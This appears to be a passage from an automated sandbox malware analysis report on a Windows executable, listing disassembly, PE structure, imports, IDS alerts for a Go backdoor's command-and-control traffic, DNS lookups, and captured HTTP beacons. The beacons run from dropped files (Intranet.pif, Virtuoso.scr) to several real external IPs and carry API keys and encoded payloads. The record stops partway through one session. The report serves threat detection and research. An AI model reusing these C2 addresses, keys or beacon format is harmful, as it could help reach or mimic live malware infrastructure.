                                                                          Thumbprint SHA-256:
                                                                          Serial:
                                                                          Instruction
                                                                          sub esp, 000002D4h
                                                                          push ebx
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          xor ebp, ebp
                                                                          pop esi
                                                                          mov dword ptr [esp+18h], ebp
                                                                          mov dword ptr [esp+10h], 00409268h
                                                                          mov dword ptr [esp+14h], ebp
                                                                          call dword ptr [00408030h]
                                                                          push 00008001h
                                                                          call dword ptr [004080B4h]
                                                                          push ebp
                                                                          call dword ptr [004082C0h]
                                                                          push 00000008h
                                                                          mov dword ptr [00472EB8h], eax
                                                                          call 00007F0BF0BBF73Bh
                                                                          push ebp
                                                                          push 000002B4h
                                                                          mov dword ptr [00472DD0h], eax
                                                                          lea eax, dword ptr [esp+38h]
                                                                          push eax
                                                                          push ebp
                                                                          push 00409264h
                                                                          call dword ptr [00408184h]
                                                                          push 0040924Ch
                                                                          push 0046ADC0h
                                                                          call 00007F0BF0BBF41Dh
                                                                          call dword ptr [004080B0h]
                                                                          push eax
                                                                          mov edi, 004C30A0h
                                                                          push edi
                                                                          call 00007F0BF0BBF40Bh
                                                                          push ebp
                                                                          call dword ptr [00408134h]
                                                                          cmp word ptr [004C30A0h], 0022h
                                                                          mov dword ptr [00472DD8h], eax
                                                                          mov eax, edi
                                                                          jne 00007F0BF0BBCD0Ah
                                                                          push 00000022h
                                                                          pop esi
                                                                          mov eax, 004C30A2h
                                                                          push esi
                                                                          push eax
                                                                          call 00007F0BF0BBF0E1h
                                                                          push eax
                                                                          call dword ptr [00408260h]
                                                                          mov esi, eax
                                                                          mov dword ptr [esp+1Ch], esi
                                                                          jmp 00007F0BF0BBCD93h
                                                                          push 00000020h
                                                                          pop ebx
                                                                          cmp ax, bx
                                                                          jne 00007F0BF0BBCD0Ah
                                                                          add esi, 02h
                                                                          cmp word ptr [esi], bx
                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [ C ] VS2010 SP1 build 40219
                                                                          • [RES] VS2010 SP1 build 40219
                                                                          • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x5d96 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x73f7ec | 0x28b0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0x5d96 | 0x5e00 | 122344e81194ddf4b9ed4509eca74dbd | False | 0.9144365026595744 | data | 7.710006874828384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfa000 | 0xf32 | 0x1000 | f7d174b6068c3ab696909b33c96ce9b9 | False | 0.589111328125 | data | 5.414096826624046 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf4238 | 0x466f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.987632410847984
RT_ICON | 0xf88a8 | 0x967 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0045700041545493
RT_ICON | 0xf9210 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5691489361702128
RT_DIALOG | 0xf9678 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xf9778 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xf9894 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xf98f4 | 0x30 | data | English | United States | 0.8541666666666666
RT_VERSION | 0xf9924 | 0x19c | data | English | United States | 0.5728155339805825
RT_MANIFEST | 0xf9ac0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-29T16:25:40.860487+0100 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 109.172.87.135 | 22016 | 192.168.2.6 | 49730 | TCP
2024-11-29T16:25:40.862913+0100 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.6 | 49730 | 109.172.87.135 | 22016 | TCP
2024-11-29T16:26:09.536154+0100 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.6 | 49730 | 109.172.87.135 | 22016 | TCP
2024-11-29T16:26:09.968816+0100 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 109.172.87.135 | 22016 | 192.168.2.6 | 49730 | TCP
                                                                          Nov 29, 2024 16:25:37.394536972 CET8049729188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:39.397080898 CET8049729188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:39.405654907 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:25:39.437179089 CET4972980192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:39.526264906 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:25:39.526385069 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:25:40.860486984 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:25:40.862912893 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:25:40.983014107 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:25:42.381830931 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:42.501804113 CET804973146.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:42.501995087 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:42.503551960 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:42.623575926 CET804973146.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:43.858613968 CET804973146.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:43.872234106 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:43.904400110 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:43.992166042 CET804973246.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:43.992295980 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:43.992676973 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:44.167327881 CET804973246.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:45.635513067 CET804973246.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:45.639333963 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:45.686866045 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:45.759424925 CET804973393.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:45.760838985 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:45.761244059 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:45.881117105 CET804973393.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:48.971350908 CET804972793.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:48.971427917 CET4972780192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:52.405086040 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:52.525454998 CET804973146.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:52.525547028 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:53.898447990 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:54.019043922 CET804973246.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:54.019226074 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:55.649162054 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:55.651699066 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:55.771614075 CET804973491.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:55.772785902 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:55.773204088 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:55.811604977 CET804973393.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:55.893740892 CET804973491.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:55.992288113 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:25:56.112390995 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:25:57.154066086 CET804973491.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:57.183129072 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.199827909 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:57.303112030 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.303180933 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.339792967 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.423263073 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.423378944 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.423445940 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.423527002 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:57.459996939 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.543289900 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.543322086 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.543977976 CET804973491.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:57.544078112 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:26:00.773581028 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:26:00.773838043 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:26:00.893834114 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:26:07.691843987 CET804973393.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:26:07.691910982 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:26:09.399477959 CET4972980192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:26:09.519634008 CET8049729188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:26:09.536154032 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:26:09.656178951 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:26:09.968816042 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:26:10.014019012 CET4973022016192.168.2.6109.172.87.135
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2024 16:24:11.989084005 CET | 55562 | 53 | 192.168.2.6 | 1.1.1.1
Nov 29, 2024 16:24:12.224910021 CET | 53 | 55562 | 1.1.1.1 | 192.168.2.6
Nov 29, 2024 16:24:26.963452101 CET | 59524 | 53 | 192.168.2.6 | 1.1.1.1
Nov 29, 2024 16:24:27.105022907 CET | 53 | 59524 | 1.1.1.1 | 192.168.2.6
Nov 29, 2024 16:24:40.641777992 CET | 52238 | 53 | 192.168.2.6 | 1.1.1.1
Nov 29, 2024 16:24:40.779093027 CET | 53 | 52238 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2024 16:24:11.989084005 CET | 192.168.2.6 | 1.1.1.1 | 0xf725 | Standard query (0) | qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi | A (IP address) | IN (0x0001) | false
Nov 29, 2024 16:24:26.963452101 CET | 192.168.2.6 | 1.1.1.1 | 0xf4ae | Standard query (0) | qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi | A (IP address) | IN (0x0001) | false
Nov 29, 2024 16:24:40.641777992 CET | 192.168.2.6 | 1.1.1.1 | 0x52a8 | Standard query (0) | qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2024 16:24:12.224910021 CET | 1.1.1.1 | 192.168.2.6 | 0xf725 | Name error (3) | qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 16:24:27.105022907 CET | 1.1.1.1 | 192.168.2.6 | 0xf4ae | Name error (3) | qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 16:24:40.779093027 CET | 1.1.1.1 | 192.168.2.6 | 0x52a8 | Name error (3) | qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi | none | none | A (IP address) | IN (0x0001) | false
                                                                          • 46.8.232.106
                                                                          • 46.8.236.61
                                                                          • 93.185.159.253
                                                                          • 91.212.166.91
                                                                          • 188.130.206.243
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 46.8.232.106 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 16:25:07.282548904 CET | 298 | OUT | POST / HTTP/1.1
Host: 46.8.232.106
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: GBhb1vep
Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
Nov 29, 2024 16:25:08.631261110 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 29 Nov 2024 15:25:08 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49721 | 46.8.236.61 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 16:25:08.756542921 CET | 297 | OUT | POST / HTTP/1.1
Host: 46.8.236.61
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: H5P4PIXa
Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
Nov 29, 2024 16:25:10.221267939 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 29 Nov 2024 15:25:09 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49722 | 93.185.159.253 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 16:25:10.456017017 CET | 300 | OUT | POST / HTTP/1.1
Host: 93.185.159.253
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: tO0bJBAO
Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49723 | 91.212.166.91 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 16:25:10.964260101 CET | 299 | OUT | POST / HTTP/1.1
Host: 91.212.166.91
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: IjSjQ8Of
Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
Nov 29, 2024 16:25:12.139635086 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 29 Nov 2024 15:25:11 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49724 | 188.130.206.243 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 16:25:12.268436909 CET | 301 | OUT | POST / HTTP/1.1
Host: 188.130.206.243
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: yRvFp1YA
Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49725 | 46.8.232.106 | 80 | 2404 | C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 16:25:23.677040100 CET | 298 | OUT | POST / HTTP/1.1
Host: 46.8.232.106
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: 0hkbIEh2
Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
Nov 29, 2024 16:25:25.363307953 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 29 Nov 2024 15:25:25 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49726 | 46.8.236.61 | 80 | 2404 | C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 16:25:25.495266914 CET | 297 | OUT | POST / HTTP/1.1
Host: 46.8.236.61
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: XN8t83s2
Accept-Encoding: gzip
